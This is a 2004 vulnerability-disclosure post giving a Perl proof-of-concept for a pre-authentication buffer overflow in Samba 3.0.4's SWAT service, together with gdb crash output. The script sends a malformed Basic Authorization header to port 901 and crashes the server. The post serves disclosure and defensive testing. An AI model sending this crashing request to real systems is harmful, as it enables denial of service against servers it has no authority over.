SWAT PreAuthorization PoC

2004-07-23T00:00:00
ID SECURITYVULNS:DOC:6531
Type securityvulns
Reporter Securityvulns
Modified 2004-07-23T00:00:00

Description

Hi,

The following is a brief proof of concept exploit code for the vulnerability mentioned in "Evgeny Demidov" <demidov@gleg.net>'s advisory: Samba 3.x swat preauthentication buffer overflow

Running the perl script against a vulnerable SWAT server will cause: Program received signal SIGSEGV, Segmentation fault. [Switching to process 30853] 0x410957af in memcpy () from /lib/tls/libc.so.6 (gdb) bt

0 0x410957af in memcpy () from /lib/tls/libc.so.6

1 0xbffff340 in ?? ()

2 0x00000001 in ?? ()

3 0x080e34e7 in ?? ()

4 0xbffff5e5 in ?? ()

5 0x082919a0 in ?? ()

6 0xffffffff in ?? ()

7 0x080e08f0 in ?? ()

8 0x082919a0 in ?? ()

9 0xffffffff in ?? ()

10 0x080e7090 in ?? ()

11 0x0c0b8fae in ?? ()

12 0xbffff5e5 in ?? ()

13 0x00000000 in ?? ()

14 0xbffff5a8 in ?? ()

15 0x0806c97d in ?? ()

16 0xbffff5e5 in ?? ()

17 0x0815fd76 in ?? ()

18 0x00000006 in ?? ()

19 0x41150ebc in ?? () from /lib/tls/libc.so.6

20 0x081c8480 in ?? ()

21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6

22 0xbffff3b4 in ?? ()

23 0x081c8480 in ?? ()

24 0x081c887f in ?? ()

25 0x00000000 in ?? ()

26 0x00000000 in ?? ()

27 0xbffff3b4 in ?? ()

28 0xbffff4cc in ?? ()

29 0x00000400 in ?? ()

30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6

31 0xbffff3b4 in ?? ()

32 0x08162fd9 in ?? ()

33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6

34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6

35 0x00000000 in ?? ()

Exploit:

!/usr/bin/perl

Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow

Created by Noam Rathaus of Beyond Security Ltd.

use IO::Socket; use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1\r Host: $host:901\r User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1\r Accept: text/xml\r Accept-Language: en-us,en;q=0.5\r Accept-Encoding: gzip,deflate\r Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r Keep-Alive: 300\r Connection: keep-alive\r Authorization: Basic =\r \r ";

print "HTTP: [$http]\n"; print $remote $http; sleep(1); print "Sent\n";

while (<$remote>) {  print $_; } print "\n";

close $remote;

-- Thanks Noam Rathaus CTO Beyond Security Ltd.

Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441